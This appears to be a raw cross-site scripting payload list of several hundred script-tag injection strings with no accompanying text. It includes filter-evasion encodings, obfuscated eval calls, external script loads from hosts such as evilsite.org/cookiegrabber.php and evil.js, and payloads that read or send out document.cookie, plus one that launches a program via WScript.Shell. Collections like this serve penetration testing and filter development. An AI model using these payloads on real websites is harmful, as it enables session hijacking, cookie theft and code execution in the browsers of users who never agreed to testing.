- <SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJKTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0EJCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0UJKSAJKCAJKSAJICA7"></SCRIPT>
- <script src=”data:text/javascript,confirm(1)”></script>
- “/><script src=”data:text/javascript,confirm(1)”></script>
- <script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
- ><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>
- “<script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”
- “\”><script src=’data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x’></script>”,
- <script src=”data:text/plain\x2Cjavascript:alert(1)”></script>
- <script/src=data:text/javascript,alert(4)></script>
- <script src=data:,\u006fnerror=\u0061lert(1)></script>
- <script src=data:,\u006fnerror=\u0061lert;throw[document.domain]></script>
- <script src=”data:\xCB\x8F,javascript:alert(1)”></script>
- <script src=”data:\xD4\x8F,javascript:alert(1)”></script>
- <script src=”data:\xE0\xA4\x98,javascript:alert(1)”></script>
- <script src=//domain%26sol;my.js%26num;
- <script src=”//domain%26sol;my.js%26num;
- <script src=//DOMAIN/></script>
- “><script src=”file:///c:/wonderful.js”></script><”
- ‘> →<script/src=//go.bmoine.fr/xss>
- <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>”
- <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>
- <;SCRIPT SRC=//ha.ckers.org/.j>;
- <SCRIPT SRC=//ha.ckers.org/.j>
- <script src=//HOST/SCRIPT></script>
- <SCRIPT =”>” SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>;
- <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
- <;SCRIPT SRC=”;http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
- <SCRIPT SRC=”http://ha.ckers.org/xss.jpg"></SCRIPT>
- <;SCRIPT SRC=http://ha.ckers.org/xss.js
- <SCRIPT SRC=http://ha.ckers.org/xss.js
- <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
- <SCRIPT =”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT+SRC=http://host/
- <script src=”/?http://html5sec.org/test.js “></script>
- <SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT>
- <SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT> // Cross Browser
- <script src=http://renwa.tk/d.js></script>
- <script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
- //|\\ <script //|\\ src=’https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
- <script src=https://www.google.com/complete/search?client=chrome
- <script src=’https://www.n00py.io/evil.js'></script>
- “<script src=’https://www.n00py.io/evil.js'></script>"
- <script src=”http://www.evilsite.org/cookiegrabber.php"></script>
- <script SRC=”http://www.securitycompass.com/xss.jpg"></script>
- <script =”>” SRC=”http://www.securitycompass.com/xss.js"></script>
- <script> src=”http://www.site.com/XSS.js"></script>
- ‘>”><script src = ‘http://www.site.com/XSS.js'></script>
- ‘>”><script src = ‘http://www.site.com/XSS.js'></script>
- <SCRIPT SRC=”http://xss.cx/xss.jpg"></SCRIPT>
- <SCRIPT SRC=http://xss.cx/xss.js?<B>
- //|\\ <script //|\\ src=’http://xss.cx/xss.js'> //|\\ </script //|\\
- <SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>
- <SCRIPT =”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT =”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT src=”http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
- <script src=http://xssor.io/xss.js></SCRIPT>
- <SCRIPT SRC=http://xss.rocks/xss.js?< B >
- <script src=http://yoursite.com/your_files.js></script>
- <script src=”//INPUT”></script>
- <script src=”INPUT”></script
- <script src=”javascript:alert(1)”>
- <script src=javascript:alert(1)>
- <script src=javascript:alert(1)>
- <script src=javascript:alert(160)>
- <script src=”javascript:alert(3)”></script> // IE6, Opera 11.01, Opera Mobile 10.1
- <SCRIPT SRC=”%(jpg)s”></SCRIPT>
- <script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(1)’)()}}
- <script src=”/js/angular1.6.4.min.js”></script><p ng-app>{{constructor.constructor(‘alert(17)’)()}}
- <SCRIPT SRC=%(jscript)s?<B>
- <script src=”/\%(jscript)s”></script>
- <script src=”\\%(jscript)s”></script>
- <script src=%(jscript)s></script>
- <SCRIPT/SRC=”%(jscript)s”></SCRIPT>
- <script src=//l0.cm>//20
- <SCRIPT SRC_NeatHtmlReplace=”//ha.ckers.org/.j”>
- <SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.jpg"></SCRIPT>
- <SCRIPT SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.js"></SCRIPT>
- <script+src=”>”+src=”http://yoursite.com/xss.js?69,69"></script>
- <script src=/upload/…></script>
- <script src=”URL”></script>
- <script src=URL></script>
- <script/src=//xss.cx>/*
- <script src=/xss.js></script><base href=//evil/
- <script>’str1ng’.replace(/1/,alert)</script>
- <script>str=’’;for(i=0;i<0xefff;i++){str+=’<script>AAAAAA’;};document.write(‘<svg>’+str+’</svg>’);</script>
- <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
- <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59)</script>
- <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
- </script><svg ‘//”
- “></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
- </script><svg onload=alert(1)>
- </script><svg onload=alert(184)>
- </script><svg onload=’-/”/-confirm(1)//’”
- </script><svg onload=’-/”/-confirm(1)//’
- →’”/></sCript><svG x=”>” onload=(co\u006efirm)``>
- /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i,
- /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i;
- “/<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i”
- ( /<script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i)
- <script/	 src=’https://dl.dropbox.com/u/13018058/js.js' /	></script>
- <script>this[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
- <script>this[490837..toString(1<<5)](/*code to eval()*/)</script>
- <script>this[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
- <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
- <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
- <script>this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
- <script>throw~delete~typeof~prompt(1)</script>
- <script>throw new class extends Function{}(‘alert(1)’)``</script>
- →</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
- →</script></title></style>”/</textarea><a’ onclick=alert()//>*/alert()/*
- >]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img -
- <script>top[‘alert’](3)</script>
- <script>try{eval(“<></>”);logBoolean(1)}catch(e){logBoolean(0)};</script>
- <script type=”text/javascript”></script>
- <script type=text/javascript></script>
- <script type=text/vbscript>msgbox document.location</script>
- <script type=text/vbscript>msgbox document.location</script> // IE 10
- <script type=”text/xaml”><Canvas Loaded=”confirm” /></script>
- <script type=vbscript>MsgBox(0)</script>
- <script>\u0061\u006C\u0065\u0072\u0074(123)</script>
- <script>\u0061\u006C\u0065\u0072\u0074`1`</script>
- <script>\u0061\u006C\u0065\u0072\u0074(1)</script>
- <script>\u0061\u006C\u0065\u0072\u0074`1`</script> // ES6 Variation
- <script>\u0061\u006C\u0065\u0072\u0074(1)</script> // Unicode escapes
- <script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script>
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U
- <script>~’\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061')</script U+
- <script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script>
- <script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script> // ES6 Variation
- ?scriptualert(EXSSE)?/scriptu
- <script> “\ud83d\u*hex4*”.match(/.*<.*/) ? log(*num*) : null; </script>
- <script>-{valueOf:location,toString:[].pop,0:’vbscript:alert%281%29',length:1}</script>
- <script>-{valueOf:location,toString:[].pop,0:’vbscript:confirm%281%29',length:1}</script>
- <script>var%20c=1337";alert(c)</script>
- <script>var%20x%20=%20a?aa?;%20confirm(1);//a?;</script>
- <script>var a = “</script> <script> alert(‘XSS !’); </script> <script>”;</script>
- <script>var fn=window[490837..toString(1<<5)];fn(atob(‘YWxlcnQoMSk=’));</script>
- <script>var fn=window[490837..toString(1<<5)];fn(/*code to eval()/*);</script>
- <script>var fn=window[atob(‘ZXZhbA==’)];fn(atob(‘YWxlcnQoMSk=’));</script>
- <script>var fn=window[atob(‘ZXZhbA==’)];fn(/*code to eval()/*);</script>
- <script>var fn=window[String.fromCharCode(101,118,97,108)];fn(atob(‘YWxlcnQoMSk=’));</script>
- <script>var fn=window[String.fromCharCode(101,118,97,108)];fn(/*code to eval()/*);</script>
- <script> vari=location.hash; document.write(i); </script>
- <script>var junk = ‘</script><script>alert(1)</script>’;</script>
- <script>var location={};</script>
- <script>var m=<html><a href=”//host”>link</a>
- <script>var m=<html><a href=//site>link</a>
- <script>var m=<html><a href=//site>link</a></html></script> // XML inside JS
- <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
- <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
- <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type=’click’; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
- <script>var name=”"-alert``//”</script>
- <script>var q=””;alert(1)//”</script>
- <script>var q=””;location=’javascript\x3Aalert\x281\x29'//”</script>
- <script>var q=””;location=’javascript\x3Aalert\x2822\x29'//”</script>
- <script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
- <script>var request = new XMLHttpRequest();request.open(‘GET’, ‘http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>
- <script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <script>var script = document.getElementsByTagName(‘script’)[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement(‘textarea’); ta.appendChild(clone); confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <script>var var = 1; alert(var)</script>
- <script>var var = 1; alert(var)</script>
- <script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
- <script>var x = document.createElement(‘iframe’);document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();</script>
- <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
- <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
- <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = ‘(.*%3F)’/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script>
- <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
- <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
- <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>
- “/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open(‘GET’,+’/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B’(.*)’/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#
- <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
- <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__(‘type’, function() {get = arguments.callee.caller.arguments.callee;return ‘click’;});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__(‘0’, function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#
- <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
- <script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>
- <script> Var x=vInputv; </script>
- <script/v>confirm(/@jackmasa/)</script>
- <script>void(‘&b=’);alert(1);</script>
- <script>window[490837..toString(1<<5)](atob(‘YWxlcnQoMSk=’))</script>
- <script>window[490837..toString(1<<5)](/*code to eval()*/)</script>
- <script>window[‘alert’](0)</script>
- <script>window[‘alert’](document[‘domain’])<script>
- <script>window.alert(‘XSS Vulnerable’);</script>
- /><script>window.alert(‘XSS Vulnerable’);</script>
- <script>window[atob(‘ZXZhbA==’)](/*code to eval()*/)</script>
- <script>window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- <script>window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)</script>
- ←’<script>window.confirm(1)</script> — !>
- `’”><script>window[‘log*chr*’](*num*)</script>
- ‘<script>window.onload=function(){document.forms[0].message.value=’1';}</script>
- <script>window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)</script>
- <script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
- <script>write(a?<img/src=//xss.cx/?a?+cookie.replace(/\s/g,””)+a?>a?)></script>
- <script\x00>alert(1)</script>
- <script>/* *\x00/javascript:alert(1)// */</script>
- <script\x00>javascript:alert(1)</script>
- “`’><script>\x00javascript:alert(1)</script>
- <script\x09>javascript:alert(1)</script>
- “`’><script>\x09javascript:alert(1)</script>
- <script\x09type=”text/javascript”>javascript:alert(1);</script>
- <script\x0A>javascript:alert(1)</script>
- “`’><script>\x0Ajavascript:alert(1)</script>
- <script\x0Atype=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x0Bjavascript:alert(1)</script>
- <script\x0C>javascript:alert(1)</script>
- “`’><script>\x0Cjavascript:alert(1)</script>
- <script\x0Ctype=”text/javascript”>javascript:alert(1);</script>
- <script\x0D>javascript:alert(1)</script>
- “`’><script>\x0Djavascript:alert(1)</script>
- <script\x0Dtype=”text/javascript”>javascript:alert(1);</script>
- <script\x20>javascript:alert(1)</script>
- “`’><script>\x20javascript:alert(1)</script>
- <script\x20type=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x21javascript:alert(1)</script>
- <script>/* *\x2A/javascript:alert(1)// */</script>
- “`’><script>\x2Bjavascript:alert(1)</script>
- <script\x2F>javascript:alert(1)</script>
- ‘“`><script>/* *\x2Fjavascript:alert(1)// */</script>
- <script\x2Ftype=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x3Bjavascript:alert(1)</script>
- <script\x3Etype=”text/javascript”>javascript:alert(1);</script>
- “`’><script>\x7Ejavascript:alert(1)</script>
- <script/x>alert(1)</script>
- <script x> alert(1) </script 1=2
- <script>!{x(){alert(1)}}.x()</script>
- <script x> alert</script 1=2
- <script x>alert(‘XSS’)<script y>
- “><script x=#”async=#”src=”//a?a?L
- “`’><script>\xC2\x85javascript:alert(1)</script>
- “`’><script>\xC2\xA0javascript:alert(1)</script>
- <script>x=”confirm(1)”.replace(/.+/,eval)//”</script>
- <script x> confirm(1) </script 1=2
- “/><script x> confirm(1) </script 1=2
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
- <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
- “`’><script>\xE1\x9A\x80javascript:alert(1)</script>
- “`’><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
- “`’><script>\xE2\x80\x80javascript:alert(1)</script>
- “`’><script>\xE2\x80\x81javascript:alert(1)</script>
- “`’><script>\xE2\x80\x82javascript:alert(1)</script>
- “`’><script>\xE2\x80\x83javascript:alert(1)</script>
- “`’><script>\xE2\x80\x84javascript:alert(1)</script>
- “`’><script>\xE2\x80\x85javascript:alert(1)</script>
- “`’><script>\xE2\x80\x86javascript:alert(1)</script>
- “`’><script>\xE2\x80\x87javascript:alert(1)</script>
- “`’><script>\xE2\x80\x88javascript:alert(1)</script>
- “`’><script>\xE2\x80\x89javascript:alert(1)</script>
- “`’><script>\xE2\x80\x8Ajavascript:alert(1)</script>
- “`’><script>\xE2\x80\x8Bjavascript:alert(1)</script>
- “`’><script>\xE2\x80\xA8javascript:alert(1)</script>
- “`’><script>\xE2\x80\xA9javascript:alert(1)</script>
- “`’><script>\xE2\x80\xAFjavascript:alert(1)</script>
- “`’><script>\xE2\x81\x9Fjavascript:alert(1)</script>
- “`’><script>\xE3\x80\x80javascript:alert(1)</script>
- “`’><script>\xEF\xBB\xBFjavascript:alert(1)</script>
- “`’><script>\xEF\xBF\xAEjavascript:alert(1)</script>
- “`’><script>\xEF\xBF\xBEjavascript:alert(1)</script>
- “`’><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
- <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
- <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/’([^’]%2b)/)[1])}};xhr.send();</script>
- <script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script>
- <script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script>
- <_:script xmlns:_=”hxxp://www.w3.org/1999/xhtml">alert(65)</_:script>
- <script>x=new ActiveXObject(“WScript.Shell”);x.run(‘calc’);</script>
- <script>x=new class extends Function{}(‘alert(1)’); x=new x;</script>
- </script><x ng-app ng-csp>{{constructor.constructor(‘alert(1)’)()}}
- <script>x=””^prompt(9)^””;y=42;</script>
- <script>x=””<<prompt(9)<<””;y=42;</script>
- <script>x=””<=prompt(9)<=””;y=42;</script>
- <script>x=””<prompt(9)<””;y=42;</script>
- <script>x=””===prompt(9)===””;y=42;</script>
- <script>x=””==prompt(9)==””;y=42;</script>
- <script>x=””>=prompt(9)>=””;y=42;</script>
- <script>x=””>>>prompt(9)>>>””;y=42;</script>
- <script>x=””>>prompt(9)>>””;y=42;</script>
- <script>x=””>prompt(9)>””;y=42;</script>
- <script>x=””||prompt(9)||””;y=42;</script>
- <script>x=””|prompt(9)|””;y=42;</script>
- <script>x=””-prompt(9)-””;y=42;</script>
- <script>x=””!=prompt(9)!=””;y=42;</script>
- <script>x=””?prompt(9):””;y=42;</script>
- <script>x=””/prompt(9)/””;y=42;</script>
- <script>x=””*prompt(9)*””;y=42;</script>
- <script>x=””&&prompt(9)&&””;y=42;</script>
- <script>x=””&prompt(9)&””;y=42;</script>
- <script>x=””%prompt(9)%””;y=42;</script>
- <script>x=””+prompt(9)+””;y=42;</script>
- <script>x=’<%’</script> %>/alert(2)</script>
- <ScRIPT x src=//0x.lv?
- <SCRIPT/XSS id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"></SCRIPT>
- <;SCRIPT/XSS SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT/XSSSRC=”http://host"></SCRIPT>
- <SCRIPT/XSS SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT/XSS SRC=”http://xss.rocks/xss.js"></SCRIPT>
- <script>z=’document.’</script>
- <script>z=document.</script>
- <script>z=+write(“</script>
- <script>z=z+’js></sc’</script>
- <script>z=z+’.net/1.’</script>
- <script>z=z+’ript>”)’</script>
- <script>z=z+<script</script>
- <script>z=z+’<script’</script>
- <script>z=z+’ src=ht’</script>
- <script>z=z+’tp://ww’</script>
- <script>z=z+’write(“‘</script>
- <script>z=z+’w.shell’</script>
- “><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>
- <scri\x00pt>alert(1);</scri%00pt>
- <Scri \ x00pt> alert (1); </ scri% 00pt>
- <scri\x00pt>confirm(1);</scri%00pt>
- </Scrpt/”%27 — !>%20<Scrpt>%20confirm(1)%20</Scrpt>
- <SCR?PT>alert(181)</SCR?PT>
- <SCR?PT>alert(41)</SCR?PT>
- <SCR?PT/SRC=data:,alert(182)>
- <SCR?PT/SRC=data:,alert(42)>
- <scr<script>ipt>alert(0x000123)</script>
- \”><scr<script>ipt>alert(0x000123)</script>
- <scr<script>ipt>alert(0x000123)</scr</script>ipt>
- \”<scr<script>ipt>alert(0x000123)</scr</script>ipt>
- <;scrscriptipt>;alert(1)<;/scrscriptipt>;
- <scr<script>ipt>alert(1)</scr</script>ipt>
- <scr<script>ipt>alert(1)</scr<script>ipt>
- <scrscriptipt>alert(1)</scrscriptipt>
- <scrscriptipt>alert(1)</scrscriptipt>
- <sCR<script>iPt>alert(1)</SCr</script>IPt>
- <scr<script>ipt>alert(1)</scr<script>ipt>F
- <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
- <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
- <scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>
- <scr<script>ipt>alert(/Xss/)</scr</script>ipt>
- <scr<script>ipt>alert(‘XSS’)</scr</script>ipt>
- <scr<script>ipt>alert(‘XSS’)</scr<script>ipt>
- <scr<script>ipt>alert(‘XSS’);</scr</script>ipt>
- <scr<script>ipt>alert(“XSS”)</scr<script>ipt>
- </scr</script>ipt><ifr<iframeame/onload=prompt()>whs
- <scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
- <scr<script>rip>alalertert</scr</script>rip>
- <sc<script>ript>alert(123)</sc</script>ript>
- <sc<script>ript>alert(1)</script>
- <select autofocus onfocus=alert`1`
- <select autofocus onfocus=alert(1)>
- <select autofocus onfocus=alert(1)>//INJECTX
- <select id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><select onchange=alert(1)><option>1<option>2
